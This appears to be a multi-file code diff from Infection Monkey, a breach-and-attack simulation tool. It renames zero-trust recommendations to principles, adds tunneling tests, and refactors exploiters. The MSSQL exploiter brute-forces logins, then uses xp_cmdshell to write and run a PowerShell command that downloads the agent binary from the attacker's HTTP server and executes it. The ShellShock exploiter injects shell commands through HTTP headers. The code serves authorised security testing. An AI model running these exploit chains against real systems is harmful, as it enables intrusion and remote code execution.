This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
|
||||
Some of the mappings are computed when this module is loaded.
|
||||
"""
|
||||
|
||||
|
@ -17,10 +17,10 @@ PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUT
|
|||
|
||||
STATUS_UNEXECUTED = u"Unexecuted"
|
||||
STATUS_PASSED = u"Passed"
|
||||
STATUS_INCONCLUSIVE = u"Inconclusive"
|
||||
STATUS_VERIFY = u"Verify"
|
||||
STATUS_FAILED = u"Failed"
|
||||
# Don't change order! The statuses are ordered by importance/severity.
|
||||
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_INCONCLUSIVE, STATUS_PASSED, STATUS_UNEXECUTED]
|
||||
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
|
||||
|
||||
TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
|
||||
TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
|
||||
|
@ -29,6 +29,8 @@ TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
|
|||
TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
|
||||
TEST_SEGMENTATION = u"segmentation"
|
||||
TEST_TUNNELING = u"tunneling"
|
||||
TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
|
||||
TESTS = (
|
||||
TEST_SEGMENTATION,
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||
|
@ -36,25 +38,32 @@ TESTS = (
|
|||
TEST_ENDPOINT_SECURITY_EXISTS,
|
||||
TEST_MACHINE_EXPLOITED,
|
||||
TEST_DATA_ENDPOINT_HTTP,
|
||||
TEST_DATA_ENDPOINT_ELASTIC
|
||||
TEST_DATA_ENDPOINT_ELASTIC,
|
||||
TEST_TUNNELING,
|
||||
TEST_COMMUNICATE_AS_NEW_USER
|
||||
)
|
||||
|
||||
RECOMMENDATION_DATA_TRANSIT = u"data_transit"
|
||||
RECOMMENDATION_ENDPOINT_SECURITY = u"endpoint_security"
|
||||
RECOMMENDATION_USER_BEHAVIOUR = u"user_behaviour"
|
||||
RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
|
||||
RECOMMENDATION_SEGMENTATION = u"segmentation"
|
||||
RECOMMENDATIONS = {
|
||||
RECOMMENDATION_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
|
||||
RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
|
||||
RECOMMENDATION_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
|
||||
RECOMMENDATION_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
|
||||
RECOMMENDATION_DATA_TRANSIT: u"Secure data at transit by encrypting it."
|
||||
PRINCIPLE_DATA_TRANSIT = u"data_transit"
|
||||
PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
|
||||
PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
|
||||
PRINCIPLE_SEGMENTATION = u"segmentation"
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
|
||||
PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
|
||||
PRINCIPLES = {
|
||||
PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
|
||||
PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
|
||||
PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
|
||||
PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
|
||||
PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
|
||||
u"Access Control) only.",
|
||||
}
|
||||
|
||||
POSSIBLE_STATUSES_KEY = u"possible_statuses"
|
||||
PILLARS_KEY = u"pillars"
|
||||
RECOMMENDATION_KEY = u"recommendation_key"
|
||||
PRINCIPLE_KEY = u"principle_key"
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
|
||||
TEST_EXPLANATION_KEY = u"explanation"
|
||||
TESTS_MAP = {
|
||||
|
@ -64,18 +73,18 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
|
||||
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_SEGMENTATION,
|
||||
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
|
||||
PILLARS_KEY: [NETWORKS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
|
||||
},
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_INCONCLUSIVE: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
||||
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC,
|
||||
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
|
||||
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_INCONCLUSIVE]
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_ENDPOINT_SECURITY_EXISTS: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
|
||||
|
@ -83,7 +92,7 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
|
||||
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_ENDPOINT_SECURITY,
|
||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||
PILLARS_KEY: [DEVICES],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
|
@ -93,19 +102,19 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
|
||||
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_ENDPOINT_SECURITY,
|
||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||
PILLARS_KEY: [DEVICES],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_INCONCLUSIVE]
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_SCHEDULED_EXECUTION: {
|
||||
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_INCONCLUSIVE: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
|
||||
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
|
||||
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_USER_BEHAVIOUR,
|
||||
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
|
||||
PILLARS_KEY: [PEOPLE, NETWORKS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_INCONCLUSIVE]
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_DATA_ENDPOINT_ELASTIC: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
|
||||
|
@ -113,7 +122,7 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
|
||||
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_DATA_TRANSIT,
|
||||
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||
PILLARS_KEY: [DATA],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
|
@ -123,10 +132,29 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
|
||||
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_DATA_TRANSIT,
|
||||
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||
PILLARS_KEY: [DATA],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
TEST_TUNNELING: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
||||
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
|
||||
},
|
||||
TEST_COMMUNICATE_AS_NEW_USER: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
|
||||
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
||||
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
}
|
||||
|
||||
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
|
||||
|
@ -143,15 +171,15 @@ PILLARS_TO_TESTS = {
|
|||
AUTOMATION_ORCHESTRATION: []
|
||||
}
|
||||
|
||||
RECOMMENDATIONS_TO_TESTS = {}
|
||||
PRINCIPLES_TO_TESTS = {}
|
||||
|
||||
RECOMMENDATIONS_TO_PILLARS = {}
|
||||
PRINCIPLES_TO_PILLARS = {}
|
||||
|
||||
|
||||
def populate_mappings():
|
||||
populate_pillars_to_tests()
|
||||
populate_recommendations_to_tests()
|
||||
populate_recommendations_to_pillars()
|
||||
populate_principles_to_tests()
|
||||
populate_principles_to_pillars()
|
||||
|
||||
|
||||
def populate_pillars_to_tests():
|
||||
|
@ -161,17 +189,17 @@ def populate_pillars_to_tests():
|
|||
PILLARS_TO_TESTS[pillar].append(test)
|
||||
|
||||
|
||||
def populate_recommendations_to_tests():
|
||||
for single_recommendation in RECOMMENDATIONS:
|
||||
RECOMMENDATIONS_TO_TESTS[single_recommendation] = []
|
||||
def populate_principles_to_tests():
|
||||
for single_principle in PRINCIPLES:
|
||||
PRINCIPLES_TO_TESTS[single_principle] = []
|
||||
for test, test_info in TESTS_MAP.items():
|
||||
RECOMMENDATIONS_TO_TESTS[test_info[RECOMMENDATION_KEY]].append(test)
|
||||
PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)
|
||||
|
||||
|
||||
def populate_recommendations_to_pillars():
|
||||
for recommendation, recommendation_tests in RECOMMENDATIONS_TO_TESTS.items():
|
||||
recommendations_pillars = set()
|
||||
for test in recommendation_tests:
|
||||
def populate_principles_to_pillars():
|
||||
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||
principles_pillars = set()
|
||||
for test in principle_tests:
|
||||
for pillar in TESTS_MAP[test][PILLARS_KEY]:
|
||||
recommendations_pillars.add(pillar)
|
||||
RECOMMENDATIONS_TO_PILLARS[recommendation] = recommendations_pillars
|
||||
principles_pillars.add(pillar)
|
||||
PRINCIPLES_TO_PILLARS[principle] = principles_pillars
|
||||
|
|
|
@ -75,7 +75,7 @@ class HostExploiter(object):
|
|||
"""
|
||||
powershell = True if "powershell" in cmd.lower() else False
|
||||
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
|
||||
|
||||
|
||||
|
||||
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
|
||||
from infection_monkey.exploit.wmiexec import WmiExploiter
|
||||
|
|
|
@ -1,17 +1,18 @@
|
|||
import logging
|
||||
import os
|
||||
import textwrap
|
||||
import sys
|
||||
from time import sleep
|
||||
|
||||
import pymssql
|
||||
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
from infection_monkey.exploit import HostExploiter
|
||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, get_target_monkey, \
|
||||
build_monkey_commandline, get_monkey_depth
|
||||
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
|
||||
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
|
||||
from infection_monkey.model import DROPPER_ARG
|
||||
from infection_monkey.utils import get_monkey_dir_path
|
||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
|
||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
@ -25,98 +26,145 @@ class MSSQLExploiter(HostExploiter):
|
|||
# Time in seconds to wait between MSSQL queries.
|
||||
QUERY_BUFFER = 0.5
|
||||
SQL_DEFAULT_TCP_PORT = '1433'
|
||||
|
||||
# Temporary file that saves commands for monkey's download and execution.
|
||||
TMP_FILE_NAME = 'tmp_monkey.bat'
|
||||
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
|
||||
|
||||
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
|
||||
|
||||
XP_CMDSHELL_COMMAND_START = "xp_cmdshell \""
|
||||
XP_CMDSHELL_COMMAND_END = "\""
|
||||
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
|
||||
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
|
||||
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
|
||||
MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \
|
||||
"DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')"
|
||||
|
||||
def __init__(self, host):
|
||||
super(MSSQLExploiter, self).__init__(host)
|
||||
self.cursor = None
|
||||
self.monkey_server = None
|
||||
self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME)
|
||||
|
||||
def _exploit_host(self):
|
||||
"""
|
||||
First this method brute forces to get the mssql connection (cursor).
|
||||
Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after
|
||||
"""
|
||||
# Brute force to get connection
|
||||
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||
cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
|
||||
self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
|
||||
|
||||
if not cursor:
|
||||
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||
return False
|
||||
# Create dir for payload
|
||||
self.create_temp_dir()
|
||||
|
||||
# Get monkey exe for host and it's path
|
||||
src_path = get_target_monkey(self.host)
|
||||
if not src_path:
|
||||
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
try:
|
||||
self.create_empty_payload_file()
|
||||
|
||||
# Create server for http download and wait for it's startup.
|
||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||
if not http_path:
|
||||
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||
return False
|
||||
LOG.info("Started http server on %s", http_path)
|
||||
self.start_monkey_server()
|
||||
self.upload_monkey()
|
||||
self.stop_monkey_server()
|
||||
|
||||
dst_path = get_monkey_dest_path(http_path)
|
||||
tmp_file_path = os.path.join(get_monkey_dir_path(), MSSQLExploiter.TMP_FILE_NAME)
|
||||
# Clear payload to pass in another command
|
||||
self.create_empty_payload_file()
|
||||
|
||||
# Create monkey dir.
|
||||
commands = ["xp_cmdshell \"mkdir %s\"" % get_monkey_dir_path()]
|
||||
MSSQLExploiter.execute_command(cursor, commands)
|
||||
self.run_monkey()
|
||||
|
||||
# Form download command in a file
|
||||
commands = [
|
||||
"xp_cmdshell \"<nul set /p=powershell (new-object System.Net.WebClient).DownloadFile>%s\"" % tmp_file_path,
|
||||
"xp_cmdshell \"<nul set /p=(^\'%s^\' >>%s\"" % (http_path, tmp_file_path),
|
||||
"xp_cmdshell \"<nul set /p=, ^\'%s^\') >>%s\"" % (dst_path, tmp_file_path)]
|
||||
MSSQLExploiter.execute_command(cursor, commands)
|
||||
MSSQLExploiter.run_file(cursor, tmp_file_path)
|
||||
self.add_executed_cmd(' '.join(commands))
|
||||
# Form monkey's command in a file
|
||||
self.remove_temp_dir()
|
||||
except Exception as e:
|
||||
raise ExploitingVulnerableMachineError, e.args, sys.exc_info()[2]
|
||||
|
||||
return True
|
||||
|
||||
def run_payload_file(self):
|
||||
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
|
||||
return self.run_mssql_command(file_running_command)
|
||||
|
||||
def create_temp_dir(self):
|
||||
dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
|
||||
self.run_mssql_command(dir_creation_command)
|
||||
|
||||
def create_empty_payload_file(self):
|
||||
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
|
||||
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
|
||||
self.run_mssql_command(tmp_file_creation_command)
|
||||
|
||||
def run_mssql_command(self, mssql_command):
|
||||
array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
|
||||
if not array_of_commands:
|
||||
raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
|
||||
self.run_mssql_commands(array_of_commands)
|
||||
|
||||
def run_monkey(self):
|
||||
monkey_launch_command = self.get_monkey_launch_command()
|
||||
self.run_mssql_command(monkey_launch_command)
|
||||
self.run_payload_file()
|
||||
|
||||
def run_mssql_commands(self, cmds):
|
||||
for cmd in cmds:
|
||||
self.cursor.execute(cmd)
|
||||
sleep(MSSQLExploiter.QUERY_BUFFER)
|
||||
|
||||
def upload_monkey(self):
|
||||
monkey_download_command = self.write_download_command_to_payload()
|
||||
self.run_payload_file()
|
||||
self.add_executed_cmd(monkey_download_command.command)
|
||||
|
||||
def remove_temp_dir(self):
|
||||
# Remove temporary dir we stored payload at
|
||||
tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path))
|
||||
self.run_mssql_command(tmp_file_removal_command)
|
||||
tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
|
||||
self.run_mssql_command(tmp_dir_removal_command)
|
||||
|
||||
def start_monkey_server(self):
|
||||
self.monkey_server = MonkeyHTTPServer(self.host)
|
||||
self.monkey_server.start()
|
||||
|
||||
def stop_monkey_server(self):
|
||||
self.monkey_server.stop()
|
||||
|
||||
def write_download_command_to_payload(self):
|
||||
monkey_download_command = self.get_monkey_download_command()
|
||||
self.run_mssql_command(monkey_download_command)
|
||||
return monkey_download_command
|
||||
|
||||
def get_monkey_launch_command(self):
|
||||
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
||||
# Form monkey's launch command
|
||||
monkey_args = build_monkey_commandline(self.host,
|
||||
get_monkey_depth() - 1,
|
||||
dst_path)
|
||||
monkey_args = ["xp_cmdshell \"<nul set /p=%s >>%s\"" % (part, tmp_file_path)
|
||||
for part in textwrap.wrap(monkey_args, 40)]
|
||||
commands = ["xp_cmdshell \"<nul set /p=%s %s >%s\"" % (dst_path, DROPPER_ARG, tmp_file_path)]
|
||||
commands.extend(monkey_args)
|
||||
MSSQLExploiter.execute_command(cursor, commands)
|
||||
MSSQLExploiter.run_file(cursor, tmp_file_path)
|
||||
self.add_executed_cmd(commands[-1])
|
||||
return True
|
||||
suffix = ">>{}".format(self.payload_file_path)
|
||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||
return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
|
||||
prefix=prefix,
|
||||
suffix=suffix)
|
||||
|
||||
@staticmethod
|
||||
def run_file(cursor, file_path):
|
||||
command = ["exec xp_cmdshell \"%s\"" % file_path]
|
||||
return MSSQLExploiter.execute_command(cursor, command)
|
||||
|
||||
@staticmethod
|
||||
def execute_command(cursor, cmds):
|
||||
"""
|
||||
Executes commands on MSSQL server
|
||||
:param cursor: MSSQL connection
|
||||
:param cmds: list of commands in MSSQL syntax.
|
||||
:return: True if successfully executed, false otherwise.
|
||||
"""
|
||||
try:
|
||||
# Running the cmd on remote host
|
||||
for cmd in cmds:
|
||||
cursor.execute(cmd)
|
||||
sleep(MSSQLExploiter.QUERY_BUFFER)
|
||||
except Exception as e:
|
||||
LOG.error('Error sending the payload using xp_cmdshell to host: %s' % e)
|
||||
return False
|
||||
return True
|
||||
def get_monkey_download_command(self):
|
||||
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
||||
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\
|
||||
format(http_path=self.monkey_server.http_path, dst_path=dst_path)
|
||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
|
||||
return MSSQLLimitedSizePayload(command=monkey_download_command,
|
||||
suffix=suffix,
|
||||
prefix=prefix)
|
||||
|
||||
def brute_force(self, host, port, users_passwords_pairs_list):
|
||||
"""
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
Main loop starts here.
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
Main loop starts here.
|
||||
|
||||
Args:
|
||||
host (str): Host ip address
|
||||
port (str): Tcp port that the host listens to
|
||||
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
|
||||
Args:
|
||||
host (str): Host ip address
|
||||
port (str): Tcp port that the host listens to
|
||||
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
|
||||
|
||||
Return:
|
||||
True or False depends if the whole bruteforce and attack process was completed successfully or not
|
||||
"""
|
||||
Return:
|
||||
True or False depends if the whole bruteforce and attack process was completed successfully or not
|
||||
"""
|
||||
# Main loop
|
||||
# Iterates on users list
|
||||
for user, password in users_passwords_pairs_list:
|
||||
|
@ -138,4 +186,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
|
||||
'aborting brute force'.format(host, port))
|
||||
return None
|
||||
raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||
|
||||
|
||||
class MSSQLLimitedSizePayload(LimitedSizePayload):
|
||||
def __init__(self, command, prefix="", suffix=""):
|
||||
super(MSSQLLimitedSizePayload, self).__init__(command=command,
|
||||
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
|
||||
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix,
|
||||
suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
|
||||
|
|
|
@ -20,6 +20,7 @@ LOG = logging.getLogger(__name__)
|
|||
TIMEOUT = 2
|
||||
TEST_COMMAND = '/bin/uname -a'
|
||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||
LOCK_HELPER_FILE = '/tmp/monkey_shellshock'
|
||||
|
||||
|
||||
class ShellShockExploiter(HostExploiter):
|
||||
|
@ -108,6 +109,10 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
|
||||
if not self._create_lock_file(exploit, url, header):
|
||||
LOG.info("Another monkey is running shellshock exploit")
|
||||
return True
|
||||
|
||||
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
|
||||
|
||||
if not http_path:
|
||||
|
@ -124,6 +129,8 @@ class ShellShockExploiter(HostExploiter):
|
|||
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
||||
self._remove_lock_file(exploit, url, header)
|
||||
|
||||
if (http_thread.downloads != 1) or (
|
||||
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||
|
@ -182,6 +189,17 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
|
||||
return False,
|
||||
|
||||
def _create_lock_file(self, exploit, url, header):
|
||||
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
|
||||
return False
|
||||
cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
|
||||
self.attack_page(url, header, cmd)
|
||||
return True
|
||||
|
||||
def _remove_lock_file(self, exploit, url, header):
|
||||
cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
|
||||
self.attack_page(url, header, cmd)
|
||||
|
||||
@staticmethod
|
||||
def attack_page(url, header, attack):
|
||||
result = ""
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
|
||||
|
||||
class ExploitingVulnerableMachineError(Exception):
|
||||
""" Raise when exploiter failed, but machine is vulnerable"""
|
||||
pass
|
|
@ -47,6 +47,13 @@ def get_interface_to_target(dst):
|
|||
return ret[1]
|
||||
|
||||
|
||||
def try_get_target_monkey(host):
|
||||
src_path = get_target_monkey(host)
|
||||
if not src_path:
|
||||
raise Exception("Can't find suitable monkey executable for host %r", host)
|
||||
return src_path
|
||||
|
||||
|
||||
def get_target_monkey(host):
|
||||
from infection_monkey.control import ControlClient
|
||||
import platform
|
||||
|
|
|
@ -7,8 +7,8 @@ from threading import Lock
|
|||
from infection_monkey.network.firewall import app as firewall
|
||||
from infection_monkey.network.info import get_free_tcp_port
|
||||
from infection_monkey.transport import HTTPServer, LockedHTTPServer
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
|
||||
from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target
|
||||
from infection_monkey.model import DOWNLOAD_TIMEOUT
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
@ -16,6 +16,7 @@ LOG = logging.getLogger(__name__)
|
|||
|
||||
|
||||
class HTTPTools(object):
|
||||
|
||||
@staticmethod
|
||||
def create_transfer(host, src_path, local_ip=None, local_port=None):
|
||||
if not local_port:
|
||||
|
@ -33,6 +34,14 @@ class HTTPTools(object):
|
|||
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
|
||||
|
||||
@staticmethod
|
||||
def try_create_locked_transfer(host, src_path, local_ip=None, local_port=None):
|
||||
http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, local_ip, local_port)
|
||||
if not http_path:
|
||||
raise Exception("Http transfer creation failed.")
|
||||
LOG.info("Started http server on %s", http_path)
|
||||
return http_path, http_thread
|
||||
|
||||
@staticmethod
|
||||
def create_locked_transfer(host, src_path, local_ip=None, local_port=None):
|
||||
"""
|
||||
|
@ -60,3 +69,22 @@ class HTTPTools(object):
|
|||
httpd.start()
|
||||
lock.acquire()
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
|
||||
|
||||
|
||||
class MonkeyHTTPServer(HTTPTools):
|
||||
def __init__(self, host):
|
||||
super(MonkeyHTTPServer, self).__init__()
|
||||
self.http_path = None
|
||||
self.http_thread = None
|
||||
self.host = host
|
||||
|
||||
def start(self):
|
||||
